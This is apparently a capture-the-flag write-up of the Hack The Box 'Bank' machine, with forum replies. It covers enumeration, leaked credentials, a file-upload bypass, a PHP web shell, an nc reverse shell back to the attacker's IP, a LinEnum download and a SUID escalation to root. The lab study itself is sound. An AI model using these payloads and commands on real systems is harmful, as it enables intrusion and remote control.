Bank write-up by Arrexel

##Enumeration##

###Nmap###

nmap -T4 -A -v 10.10.10.29

Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-18 15:11 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:11
Completed NSE at 15:11, 0.00s elapsed
Initiating NSE at 15:11
Completed NSE at 15:11, 0.00s elapsed
Initiating Ping Scan at 15:11
Scanning 10.10.10.29 [4 ports]
Completed Ping Scan at 15:11, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:11
Completed Parallel DNS resolution of 1 host. at 15:11, 0.02s elapsed
Initiating SYN Stealth Scan at 15:11
Scanning 10.10.10.29 [1000 ports]
Discovered open port 53/tcp on 10.10.10.29
Discovered open port 80/tcp on 10.10.10.29
Discovered open port 22/tcp on 10.10.10.29
Increasing send delay for 10.10.10.29 from 0 to 5 due to 138 out of 344 dropped probes since last increase.
Increasing send delay for 10.10.10.29 from 5 to 10 due to 113 out of 281 dropped probes since last increase.
Warning: 10.10.10.29 giving up on port because retransmission cap hit (6).
Completed SYN Stealth Scan at 15:12, 53.95s elapsed (1000 total ports)
Initiating Service scan at 15:12
Scanning 3 services on 10.10.10.29
Completed Service scan at 15:12, 11.36s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.29
Retrying OS detection (try #2) against 10.10.10.29
Retrying OS detection (try #3) against 10.10.10.29
Retrying OS detection (try #4) against 10.10.10.29
Retrying OS detection (try #5) against 10.10.10.29
Initiating Traceroute at 15:13
Completed Traceroute at 15:13, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 15:13
Completed Parallel DNS resolution of 2 hosts. at 15:13, 0.02s elapsed
NSE: Script scanning 10.10.10.29.
Initiating NSE at 15:13
Completed NSE at 15:13, 8.54s elapsed
Initiating NSE at 15:13
Completed NSE at 15:13, 0.00s elapsed
Nmap scan report for 10.10.10.29
Host is up (0.12s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (EdDSA)
53/tcp open  domain
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

We can see the server is running SSH, a DNS server and an Apache server. The default Apache page loads, so it is fairly safe to assume it requires a hostname to view the actual website. When I originally did this box, I just guessed bank.htb as the host, as several other boxes had a similar setup. After speaking with quite a few people, nobody had a better answer for how to actually get the hostname. If you know, please share in the comments!

Edit: after speaking with a ton of people, including most of our moderators and admins (including the machine tester) it appears as if the DNS server was not configured to disclose the domain name. So, unfortunately, in this case we just had to guess!

If we add bank.htb to our /etc/hosts file and attempt to browse to it, we are presented with a login page.

At this point we want to fuzz the site to see if there is anything interesting.

###Dirbuster###

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Mon Sep 18 19:22:36 EDT 2017
--------------------------------

http://bank.htb:80
--------------------------------
Directories found during testing:

Dirs found with a 302 response:
/

Dirs found with a 403 response:
/uploads/
/icons/

Dirs found with a 200 response:
/assets/
/assets/js/
/assets/css/
/assets/font-awesome/
/assets/fonts/
/assets/img/
/assets/js/theme/
/assets/font-awesome/css/
/assets/font-awesome/fonts/
/assets/font-awesome/less/
/assets/font-awesome/scss/
/assets/css/theme/
/inc/

--------------------------------
Files found during testing:

Files found with a 302 responce:
/index.php
/support.php
/logout.php
/inc/header.php

Files found with a 200 responce:
/login.php
/assets/js/jquery.js
/assets/js/bootstrap.min.js
/assets/js/sweetalert.min.js
/assets/js/bootstrap.js
/assets/img/Thumbs.db
/assets/fonts/glyphicons-halflings-regular.eot
/assets/js/theme/calendar.js
/assets/css/htb-bank.css
/assets/js/theme/custom.js
/assets/css/login.css
/assets/js/theme/forms.js
/assets/fonts/glyphicons-halflings-regular.ttf
/assets/css/bootstrap.css
/assets/fonts/glyphicons-halflings-regular.woff
/assets/js/theme/editors.js
/assets/js/theme/tables.js
/assets/css/bootstrap.min.css
/assets/css/sweetalert.css
/assets/fonts/glyphicons-halflings-regular.woff2
/assets/js/theme/stats.js
/assets/fonts/glyphicons-halflings-regular.svg
/assets/font-awesome/css/font-awesome.css
/assets/font-awesome/fonts/FontAwesome.otf
/assets/font-awesome/scss/_bordered-pulled.scss
/assets/font-awesome/less/bordered-pulled.less
/assets/font-awesome/css/font-awesome.min.css
/assets/css/theme/calendar.css
/assets/font-awesome/less/fixed-width.less
/assets/css/theme/forms.css
/assets/font-awesome/less/font-awesome.less
/assets/css/theme/buttons.css
/assets/font-awesome/scss/_core.scss
/assets/css/theme/stats.css
/assets/font-awesome/scss/_larger.scss
/assets/font-awesome/fonts/fontawesome-webfont.eot
/assets/font-awesome/scss/_icons.scss
/assets/font-awesome/scss/_list.scss
/assets/css/theme/styles.css
/assets/font-awesome/less/larger.less
/assets/font-awesome/less/core.less
/assets/font-awesome/scss/_mixins.scss
/assets/font-awesome/scss/_fixed-width.scss
/assets/font-awesome/scss/_path.scss
/assets/font-awesome/less/list.less
/assets/font-awesome/scss/_rotated-flipped.scss
/assets/font-awesome/less/mixins.less
/assets/font-awesome/scss/_spinning.scss
/assets/font-awesome/less/path.less
/assets/font-awesome/less/icons.less
/assets/font-awesome/less/spinning.less
/assets/font-awesome/fonts/fontawesome-webfont.ttf
/assets/font-awesome/less/stacked.less
/assets/font-awesome/scss/_variables.scss
/assets/font-awesome/fonts/fontawesome-webfont.svg
/assets/font-awesome/less/rotated-flipped.less
/assets/font-awesome/less/variables.less
/assets/font-awesome/fonts/fontawesome-webfont.woff
/assets/font-awesome/scss/font-awesome.scss
/assets/font-awesome/scss/_stacked.scss
/inc/footer.php
/inc/user.php
/inc/ticket.php

--------------------------------

##Exploitation##
###Method 1 (Inteded)###
While this was the intended method, many people overlooked it due to support.php being visible almost immediately when scanning. The /balance-transfer/ directory took some time to find but is the intended method.

If you look through the files, they are all encrypted at first glance. If you take a closer look, there is one file which is much smaller than the rest:

Bank Balance Transfer File

If you open up the file, we see some nice, unencrypted credentials that we can use to log into the control panel.

--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+

===UserAccount===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===

From here we can head over to the support page and upload our malicious PHP file, with the extension .htb. Refer to Method 2 to get more information on this.

###Method 2 (Unintended)###

If you look at the response size for support.php you may notice something is a bit off, especially considering the page gives a 302 redirect.

Let’s fire up Burp and take a closer look. Enable server response intercepting in the proxy options and see what the page response is before the redirect fires.

Look at that, the entire page contents are sent before we are redirected. If we create a local HTML file and paste in the form section, we can hopefully create tickets. Don’t forget to change the form action to the server and include JQuery from the server.

Note the comment <!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->. From the looks of it, this is definitely the right way in.

<html>
    <body>
        <form class="new_ticket" id="new_ticket" accept-charset="UTF-8" method="post" enctype="multipart/form-data" action="http://bank.htb/support.php">
            <label>Title</label>
            <input required placeholder="Title" class="form-control" type="text" name="title" id="ticket_title" style="background-repeat: repeat; background-image: none; background-position: 0% 0%;">
            <br>
            <label>Message</label>
            <textarea required placeholder="Tell us your problem" class="form-control" style="height: 170px; background-repeat: repeat; background-image: none; background-position: 0% 0%;" name="message" id="ticket_message"></textarea>
            <br>
            <div style="position:relative;">
                    <!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
                    <a class='btn btn-primary' href='javascript:;'>
                        Choose File...
                        <input type="file" required style='position:absolute;z-index:2;top:0;left:0;filter: alpha(opacity=0);-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";opacity:0;background-color:transparent;color:transparent;' name="fileToUpload" size="40"  onchange='$("#upload-file-info").html($(this).val().replace("C:\\fakepath\\", ""));'>
                    </a>
                     
                    <span class='label label-info' id="upload-file-info"></span>
            </div>
            <br>
            <button name="submitadd" type="submit" class="btn btn-primary mt20" data-disable-with="<div class="loading-o" style="padding: 7px 21px;"></div>">Submit</button>
        </form>
        
        <script src="http://bank.htb/assets/js/jquery.js"></script>
    </body>
</html>

Create a malicious PHP file of your choosing, in this case I just used <?php echo (system($_GET['go'])); ?> and save it with .htb as the extension.

Upload it using the local HTML file we created. We immediately get redirected to the login page. Going back to our dirbust, we see an /uploads/ folder. If we browse to http://bank.htb/uploads/writeup.htb we find our file!

Start our local nc listener with nc -nvlp 6969 and get the server to connect back to us by browsing to http://bank.htb/uploads/writeup.htb?go=nc -e /bin/sh 10.10.14.3 6969 and we now have shell! We can grab the user flag from /home/chris/user.txt

At this point, there is nothing that sticks out immediately for escalation. We can drop rebootuser's LinEnum script on the machine and run it to see if we can find anything. If you have never used LinEnum before, definitely check it out! I use it on every HTB machine. We will want to run it with the -t flag to enable thorough checks. It gives a ton of output, so I will trim out the parts that we don’t need. Note that I used a local Apache server to serve LinEnum.

wget 10.10.14.3/linenum.sh
chmod +x linenum.sh
./linenum.sh -t

#########################################################
##Local Linux Enumeration & Privilege Escalation Script##
#########################################################
www.rebootuser.com

Debug Info
thorough tests = enabled

Scan started at:
Tue Sep 19 03:15:16 EEST 2017

### SYSTEM ##############################################
Kernel information:
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 i686 i686 GNU/Linux

Kernel information (continued):
Linux version 4.4.0-79-generic (buildd@lcy01-30) (gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3) ) #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017

Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
NAME="Ubuntu"
VERSION="14.04.5 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.5 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

SUID files:
-rwsr-xr-x 1 root root 112204 Jun 14 18:27 /var/htb/bin/emergency
-rwsr-xr-x 1 root root 5480 Mar 27 18:34 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 492972 Aug 11  2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9808 Nov 24  2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 daemon daemon 46652 Oct 21  2013 /usr/bin/at
-rwsr-xr-x 1 root root 35916 May 17 02:38 /usr/bin/chsh
-rwsr-xr-x 1 root root 45420 May 17 02:38 /usr/bin/passwd
-rwsr-xr-x 1 root root 44620 May 17 02:38 /usr/bin/chfn
-rwsr-xr-x 1 root root 18168 Nov 24  2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 30984 May 17 02:38 /usr/bin/newgrp
-rwsr-xr-x 1 root root 18136 May  8  2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 66284 May 17 02:38 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 156708 May 29 13:19 /usr/bin/sudo
-rwsr-xr-x 1 root root 72860 Oct 21  2013 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 17996 Nov 24  2016 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 323000 Apr 21  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 38932 May  8  2014 /bin/ping
-rwsr-xr-x 1 root root 43316 May  8  2014 /bin/ping6
-rwsr-xr-x 1 root root 35300 May 17 02:38 /bin/su
-rwsr-xr-x 1 root root 30112 May 15  2015 /bin/fusermount
-rwsr-xr-x 1 root root 88752 Nov 24  2016 /bin/mount
-rwsr-xr-x 1 root root 67704 Nov 24  2016 /bin/umount

Full report: [00;31m#########################################################[00m[00;3 - Pastebin.com

First thing on the SUID list is /var/htb/bin/emergency and that looks pretty ■■■■ suspicious. Let’s take a closer look.

Attempting to run it over nc seemingly does nothing, so let’s get a semi-interactive pty with the good ol’ python -c 'import pty; pty.spawn("/bin/bash")'

If we run it now, we get something! Looks like it spawns a shell for us and we just happen to be in the root group.

python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.3$ pwd
pwd
/var/htb/bin
bash-4.3$ ls
ls
emergency
bash-4.3$ ./emergency
./emergency
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

Grab the flag from /root/root.txt and that’s all she wrote!

Hey arrexel.You wget the linenum script after setting up something like SimpleHTTPServer or something like that?

@d0ppl3r said:
Hey arrexel.You wget the linenum script after setting up something like SimpleHTTPServer or something like that?

Yeah he would of set up a python SimpleHTTPServer, so he would of his end:
python -m SimpleHTTPServer then wget http://ip:8000/script

I usually use Apache as it is also built into Kali and doesn’t require a terminal window to be left open. Also I have accidentally started SimpleHTTPServer in the wrong directory in the past and want to minimize exposure of the rest of my machine. Also don’t have to remember to set the port with Apache :stuck_out_tongue:

Nice… :+1:

Good job, I didn’t know the intended way existed before :+1:

Nice write-up. Another method for priv esc is the world-writable passwd file.

Nice write-up!!

Thanks for the write up!! I will try linenum since privesc is something very hard to me.

revisited

revisited

revisited

Strange, I got the root.txt and user.txt but the hashes cannot be submitted as a flag, getting error when entering. Anybody else has the same issue?